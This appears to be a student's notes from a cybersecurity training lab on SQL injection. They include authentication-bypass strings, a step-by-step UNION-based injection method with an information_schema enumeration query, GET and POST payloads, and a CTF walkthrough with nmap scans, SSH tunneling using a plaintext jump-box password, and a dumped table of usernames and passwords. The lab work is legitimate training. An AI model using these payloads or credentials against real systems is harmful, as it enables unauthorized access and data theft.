          lvaZsAC2R0TC, 10.50.15.162

Basic SQL Commands:
          https://sec-cted-tech-college-cttsb-cctc-sec-12e0e75a1babbeec38083447b9.cybbh.io/05_SQL_Injection.html#what-is-sql:~:text=of%20another%20table.-,Basic%20SQL%20Commands,-Command

SQL Practice Activity:
         https://sqlbolt.com/

DEFAULT DATABASE: (Looking for non-default)
          MySql
          Information_schema
          Performance_schema

Unsanatized: input fields can be found using a single quote -> '

!!!!!!!!!!!DEMOOOOOO!!!!!!!!!!!!

ssh -MS
ssh

mysql
#ACCESS MYSQL FROM THE SQL SERVER
          show databases; (dont look at defualts)
          show tables from session;
          select * from session.car; (database.table)
          use session; (moves us into database)
          show tables;
          select * from car; (getting all from car table)
#UNION SELECT
          select * from Tires;
          select * from car UNION select tireid,name,size,cost,1,2 FROM Tires; (must match amout of colomns in first table, 1&2 are filler)

# TRUTH STATEMENTS
          select * from user;
          select * from user where name= 'admin' OR 1=1;


#SQLI
          tom ' OR 1='1          (use for password and username)
#GET (URL) METHOD


#investigation
          127.0.0.1:8888/uniondemo.php?selection1-*
#CHECK FOR VULNERABILITIES
          127.0.0.1:8888/uniondemo.php?selection1-* OR 1=1 (truth statement)
          //Selection=2 dumped the whole table
(step through til no error)
           127.0.0.1:8888/uniondemo.php?selection=2 UNION SELECT 1
           127.0.0.1:8888/uniondemo.php?selection=2 UNION SELECT 1,2
           127.0.0.1:8888/uniondemo.php?selection=2 UNION SELECT 1,2,3 #THIS WORKED, 3 COLOMNS
           127.0.0.1:8888/uniondemo.php?selection=2 UNION SELECT 1,2,3,4

#GOLDEN STATEMENT
          UNION SELECT table_schema,Table_name,column_name (,placeholders if needed) From information_schema.columns;
          127.0.0.1:8888/uniondemo.php?selection=2 UNION SELECT table_schema,Table_name,column_name (,placeholders if needed) From information_schema.columns;  
#CRAFT QUERY
          127.0.0.1:8888/uniondemo.php?selection=2 UNION SELECT id,name,pass FROM session.user;

#SQLI STEPS
          1. Identify vulnerale field --      ...php?Selection=1 OR 1=1
          2. Idnetify number of columns --    UNION SELECT 1,2,3
          3. Edit Golden Statemen to match the number of columns
                  UNION SELECT table_schema,Table_name,column_name (,placeholders if needed) From information-schema.columns;
          4. Craft queries
                    UNION SELECT <COLUMN_NAME>,<COLUMN_NAME>,<COLUMN_NAME>,<PLACEHOLDER> From <DATABASE>.<TABLE>

##POST METHOD
          ' OR 1='1
          ' UNION SELECT 1,2,3,4
          ' UNION SELECT table_schema,Table_name,column_name (,placeholders if needed) From information_schema.columns;
          ' UNION SELECT id,name,pass FROM session.user
###VERSION
          http://127.0.0.1:8888/uniondemo.php?Selection=2 UNION SELECT 1,2,@@version


--------------------------------------------------------------------------------------------------------------------------------------------------------------
SQL INJECTION CTF!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
Scheme of Maneuver:
          >Jump Box
          ->T1:10.100.28.48
Target Section:
          T1
                    Hostname: donovian-nla
                    IP: 10.100.28.48
                    OS: unknown
                    Creds:unknown
                    Last Known SSH Port: unknown
                    Last Known HTTP Port: 80
proxychains nmap -sT -sV -Pn -T5 10.100.28.48
          Nmap scan report for 10.100.28.48
          PORT     STATE SERVICE VERSION
          80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
          4444/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
          Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
proxychains nmap --script=http-enum 10.100.28.48
          PORT     STATE SERVICE
          80/tcp   open  http
                    | http-enum: 
                    |   /css/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
                    |   /images/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
                    |   /includes/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
                    |   /js/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
                    |_  /scripts/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
                    4444/tcp open  krb524


sudo ssh -MS /tmp/jump student@10.50.15.162 -L 23300:10.100.28.48:4444 -L 23301:10.100.28.48:80 -D 9050
        firefox http://127.0.0.1:23301  
                    brought me to Donovia National Logistics Agency Website

http://127.0.0.1:23301/cases/productsCategory.php?category=13%20UNION%20SELECT%20table_schema,Table_name,column_name%20From%20information_schema.columns
http://127.0.0.1:23301/cases/productsCategory.php?category=13%20UNION%20SELECT%20id,username,password%20from%20sqlinjection.members
                    1	Boss	0tj6MAeQtNWmN6gGhRmB
                    2	Maverick	turn&burn
                    3	phreak	pwd
                    4	Susan	flowers99
                    5	TW	imAPlaya
                    6	1-2-3-4	sayULuvM3
                    7	rich_kid	1M$
                    8	p0pStar	thrilla
                    9	Joe	vato
                    10		flag:













